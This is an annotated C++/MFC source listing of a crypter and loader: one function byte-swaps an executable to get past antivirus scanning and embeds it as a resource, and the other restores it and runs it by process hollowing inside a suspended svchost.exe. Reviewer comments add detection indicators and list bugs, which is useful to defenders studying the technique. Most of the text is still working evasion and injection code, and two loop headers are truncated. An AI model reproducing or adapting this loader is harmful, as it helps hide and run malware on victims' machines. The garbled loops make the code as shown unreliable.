01 // Adds a modified executable to another, normal executable in the form of a resource.
// Deformation(): reads strRstFile fully into memory, builds a copy in which
// every adjacent even/odd byte pair is swapped (loop below), and stores that
// copy as a resource of type "PI", id 1001, language-neutral, in strDstFile.
// Defender's notes: the author's stated purpose of the swap is to defeat
// signature scanning; the transform is trivially reversible (the inverse
// loop lives in OnBuild()) and leaves its own marker — an embedded image
// whose first two bytes read "ZM" instead of "MZ". A custom "PI" resource
// holding data of that shape is itself a usable hunting indicator.
// Parameters: strRstFile — file whose bytes become the resource;
//             strDstFile — PE whose resource table is updated in place.
// Returns: the BOOL from EndUpdateResource, or 0 when GlobalAlloc fails.
//   The UpdateResource result stored in `result` is overwritten one line
//   later, so an UpdateResource failure is never reported.
// Known defects, left as written: return values of CFile::Open, ReadHuge
//   and BeginUpdateResource are not checked; `rstdata` (new[]) is never
//   deleted and `p` (GlobalAlloc) is never freed on any path.
// MessageBox(text, caption, flags) is the CWnd member form, so this was
//   presumably pasted out of a CDialog-derived class — TODO confirm.
02 BOOL Deformation(CString strRstFile,CString strDstFile)
03 {
04 CFile file;
05 BYTE *rstdata;      // raw bytes of strRstFile (new[]; never released)
06 DWORD dwLen;        // size of strRstFile in bytes
07 HANDLE hUpdateRes;  // handle from BeginUpdateResource
08 BOOL result;
09 LPBYTE p;           // swapped copy of rstdata, handed to UpdateResource
10 // Read the file that will become the resource into memory.
11 file.Open(strRstFile, CFile::modeRead);    // return value not checked
12 dwLen=file.GetLength();
13 rstdata=new BYTE[dwLen];
14 file.ReadHuge(rstdata, dwLen);              // bytes actually read not checked
15 file.Close();
16
17 // Allocate space for the transformed data.
18 p = (LPBYTE)GlobalAlloc(GPTR, dwLen);
19 if (p == NULL)
20 {
21 MessageBox("分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);   // "Memory allocation failed!" / "Error"
22 return 0;   // rstdata leaks on this path
23 }
24 // Copy the resource data.
25 CopyMemory((LPVOID)p, (LPCVOID)rstdata, dwLen);
26 // Original comment: "swap the values of each front/back byte pair so it
// can get past AV scanning". The swap replaces the plain "MZ"/PE signatures
// in the stored copy; OnBuild() performs the matching inverse.
27 for (DWORD i=0; i
// NOTE(review): the loop header above is truncated in this listing — the
// text after `i` (the comparison and the rest of the header) was lost, most
// likely an HTML extraction artifact. Left as-is. Only even `i` swap; `i`
// is advanced by the `i++` at the end of the body. If dwLen is odd, the
// final `rstdata + i + 1` access would read one byte past the buffer —
// depends on the missing condition, so TODO confirm.
28 {
29 if (i%2 ==0)
30 {
31 CopyMemory((LPVOID)(p + i), (LPCVOID)(rstdata + i + 1), 1);   // p[i]   = src[i+1]
32 CopyMemory((LPVOID)(p + i + 1), (LPCVOID)(rstdata + i), 1);   // p[i+1] = src[i]
33 }
34 i++;
35 }
36
37 // Write the resource into the target exe file.
38 hUpdateRes=BeginUpdateResource(strDstFile, FALSE);   // FALSE = keep existing resources; NULL result not checked
39 result=UpdateResource(hUpdateRes, _T("PI"), MAKEINTRESOURCE(1001), MAKELANGID(LANG_NEUTRAL, SUBLANG_SYS_DEFAULT), (LPVOID)p, dwLen);   // OnBuild() looks this up as type "pi", id IDR_PI1 — the two must refer to the same resource; IDR_PI1's value is not on this page
40 result=EndUpdateResource(hUpdateRes, FALSE); // fDiscard must be FALSE, otherwise the update is not written; this also clobbers the UpdateResource result
41 return result;
42 }
// Reads the modified executable (resource) into memory, restores it, then runs it.
// OnBuild(): loads resource "pi"/IDR_PI1, undoes the byte-pair swap applied
// by Deformation(), then executes the restored image inside a freshly
// created, suspended svchost.exe by unmapping that process's original image
// and writing the payload's headers and sections in its place — the
// technique commonly called process hollowing (RunPE).
// Defender's notes: the observable sequence here — CreateProcess with
// CREATE_SUSPENDED, ZwUnmapViewOfSection on the child's image base,
// VirtualAllocEx/WriteProcessMemory with PAGE_EXECUTE_READWRITE into it, a
// write to the child PEB's ImageBaseAddress, SetThreadContext and
// ResumeThread — is the classic behavioural signature EDR and sandbox rules
// key on, and the resulting process carries an in-memory image that does
// not match its file on disk. Failed attempts leave an orphaned suspended
// child behind (no TerminateProcess on any error path).
// Returns: 0 on every path except the early `return FALSE`s — i.e. the
//   function reports failure even after a successful ResumeThread.
// 32-bit only: uses CONTEXT.Ebx/Eax, IMAGE_NT_HEADERS, and casts HANDLE and
//   ImageBase to unsigned long/DWORD.
// Leaks as written: `q` is never freed; `p` is not freed on the
//   FALSE-returning paths.
001 bool OnBuild()
002 {
003 // TODO: Add your control notification handler code here   (MFC wizard boilerplate; with the 3-arg MessageBox this looks like a CDialog member pasted out of its class — TODO confirm)
004 HRSRC hResInfo;     // resource lookup handle
005 HGLOBAL hResData;   // loaded resource
006 DWORD dwSize;       // resource size in bytes
007 LPBYTE p;           // restored (un-swapped) image; what gets written into the child
008 LPBYTE q;           // untouched copy of the resource, used as the swap source; never freed
009
010 // Locate the required resource.
011 hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_PI1), "pi");   // IDR_PI1 is defined elsewhere; must match the id/type written by Deformation()
012 if (hResInfo == NULL)
013 {
014 MessageBox("查找资源失败!", "错误", MB_OK|MB_ICONINFORMATION);   // "Resource lookup failed!" / "Error"
015 return 0;
016 }
017 // Get the resource size.
018 dwSize = SizeofResource(NULL, hResInfo);
019 // Load the resource.
020 hResData = LoadResource(NULL, hResInfo);
021 if (hResData == NULL)
022 {
023 MessageBox("装载资源失败!", "错误", MB_OK|MB_ICONINFORMATION);   // "Resource load failed!"
024 return 0;
025 }
026 // Allocate space for the data.
027 p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
028 if (p == NULL)
029 {
030 MessageBox("p分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);   // "p: memory allocation failed!"
031 return 0;
032 }
033
034 q = (LPBYTE)GlobalAlloc(GPTR, dwSize);
035 if (q == NULL)
036 {
037 MessageBox("q分配内存失败!", "错误", MB_OK|MB_ICONINFORMATION);   // "q: memory allocation failed!" (p leaks here)
038 return 0;
039 }
040 // Copy the resource data — twice: p is rewritten in place below, q stays the source.
041 ::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
042 ::CopyMemory((LPVOID)q, (LPCVOID)LockResource(hResData), dwSize);
043 // Restore the executable: inverse of the pair swap in Deformation() (p[i]=q[i+1], p[i+1]=q[i] for even i).
044 for (DWORD i=0; i
// NOTE(review): loop header truncated in this listing (text after `i` lost,
// presumably an HTML extraction artifact). Left as-is; same shape as the
// loop in Deformation().
045 {
046 if (i%2 ==0)
047 {
048 ::CopyMemory((LPVOID)(p + i), (LPVOID)(q + i + 1), 1);
049 ::CopyMemory((LPVOID)(p + i + 1), (LPVOID)(q + i), 1);
050 }
051 i++;
052 }
053
054 IMAGE_DOS_HEADER DosHeader;   // copies of the payload's DOS and NT headers, taken from p
055 IMAGE_NT_HEADERS NtHeader;    //   (32-bit IMAGE_NT_HEADERS)
056
057 PROCESS_INFORMATION pi;
058 STARTUPINFO si;
059 CONTEXT context;              // primary-thread context of the suspended child
060 PVOID ImageBase;              // where the payload image is allocated in the child
061 unsigned long BaseAddr;       // child's original image base, read from its PEB; later reused as scratch for VirtualProtectEx's old-protect output
062 unsigned long retByte = 0;    // bytes written by WriteProcessMemory (never examined)
063 LONG offset;                  // offset of the section table within p
064
065 HMODULE hNtDll=GetModuleHandle("ntdll.dll");
066 if(!hNtDll)
067 return FALSE;   // p and q leak
068 ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtDll,"ZwUnmapViewOfSection");   // typedef is not on this page; a NULL result is not checked before the call below
069
070 memset(&si, 0, sizeof(si));
071 memset(&pi, 0, sizeof(pi));
072 si.cb = sizeof(si);
073
074 ::CopyMemory((void *)&DosHeader,p,sizeof(IMAGE_DOS_HEADER));
075 ::CopyMemory((void *)&NtHeader,&p[DosHeader.e_lfanew],sizeof(IMAGE_NT_HEADERS));
076
077 // Create the host process suspended (CREATE_SUSPENDED): its primary thread
// has not run yet, so its image can be replaced before it starts.
078 BOOL res = CreateProcess(NULL,"C://windows//system32//svchost.exe",NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);
079
080 if (res)
081 {
082 context.ContextFlags = CONTEXT_FULL;
083 if (!GetThreadContext(pi.hThread,&context)) // if the call fails
084 {
085 CloseHandle(pi.hThread);
086 CloseHandle(pi.hProcess);
087 return FALSE;   // child left suspended; p and q leak
088 }
089 ReadProcessMemory(pi.hProcess,(void *)(context.Ebx + 8),&BaseAddr,sizeof(unsigned long),NULL);   // assumes the x86 convention that Ebx of the suspended primary thread holds the PEB address and +8 is ImageBaseAddress; return value not checked
090 if (!BaseAddr)
091 {
092 CloseHandle(pi.hThread);
093 CloseHandle(pi.hProcess);
094 return FALSE;
095 }
096 // Unmap the host ("puppet") process's own image.
097 if (ZwUnmapViewOfSection((unsigned long)pi.hProcess,BaseAddr))   // NTSTATUS: any non-zero value is treated as failure
098 {
099 CloseHandle(pi.hThread);
100 CloseHandle(pi.hProcess);
101 return FALSE;
102 }
103 ImageBase = VirtualAllocEx(pi.hProcess,   // only the payload's preferred base is tried; no relocation handling exists in this code
104 (void *)NtHeader.OptionalHeader.ImageBase,
105 NtHeader.OptionalHeader.SizeOfImage,
106 MEM_RESERVE|MEM_COMMIT,
107 PAGE_EXECUTE_READWRITE); //ImageBase 0x00400000 (original note); an RWX region in a remote process is a strong detection signal
108 if (ImageBase == NULL)
109 {
110 DWORD wrongFlag = GetLastError();   // unused local
111 CloseHandle(pi.hThread);
112 CloseHandle(pi.hProcess);
113 return FALSE;
114 }
115 // Replace the host's memory contents: headers first.
116 if(!WriteProcessMemory(pi.hProcess, ImageBase, p, NtHeader.OptionalHeader.SizeOfHeaders, &retByte))
117 {
118 DWORD wrongFlag2 = GetLastError();   // unused local; a failure here is not fatal, execution continues
119 }
120 // Total size of DOS header + PE header + section table:
121 // position at the section headers.
122 offset = DosHeader.e_lfanew + sizeof(IMAGE_NT_HEADERS);   // assumes a standard-size optional header (FileHeader.SizeOfOptionalHeader is not consulted)
123 IMAGE_SECTION_HEADER secHeader;
124 WORD i = 0;
125 for (;i < NtHeader.FileHeader.NumberOfSections;i++)
126 {
127 // Locate each section and copy its raw data to its virtual address in the child.
128 ::CopyMemory((void *)&secHeader, &p[offset + i*sizeof(IMAGE_SECTION_HEADER)],sizeof(IMAGE_SECTION_HEADER));
129 WriteProcessMemory(pi.hProcess,(LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress),&p[secHeader.PointerToRawData],secHeader.SizeOfRawData,&retByte);   // result ignored
130 VirtualProtectEx(pi.hProcess, (LPVOID)((DWORD)ImageBase + secHeader.VirtualAddress), secHeader.Misc.VirtualSize, PAGE_EXECUTE_READWRITE,&BaseAddr);   // every section left RWX; BaseAddr reused as the old-protect out-param; result ignored
131 }
132
133 context.ContextFlags = CONTEXT_FULL;
134 // Reset the executable entry point: first point the child's
// PEB.ImageBaseAddress at the new image ...
135 WriteProcessMemory(pi.hProcess, (void *)(context.Ebx + 8),
136 &ImageBase, //4194304 (= 0x00400000, original note)
137 4, &retByte);
138 context.Eax = (unsigned long)ImageBase + NtHeader.OptionalHeader.AddressOfEntryPoint;   // ... then set Eax — assumed here to be the suspended x86 thread's start address — to the payload's entry point
139 SetThreadContext(pi.hThread,&context);   // result ignored
140 ResumeThread(pi.hThread);               // payload now runs inside the svchost.exe process
141 }
142
143 CloseHandle(pi.hThread);    // if CreateProcess failed these are the zeroed (NULL) handles from memset
144 CloseHandle(pi.hProcess);
145
146 GlobalFree((HGLOBAL)p);     // q is never freed
147
148 return 0;                   // always false, even after a successful launch
149 }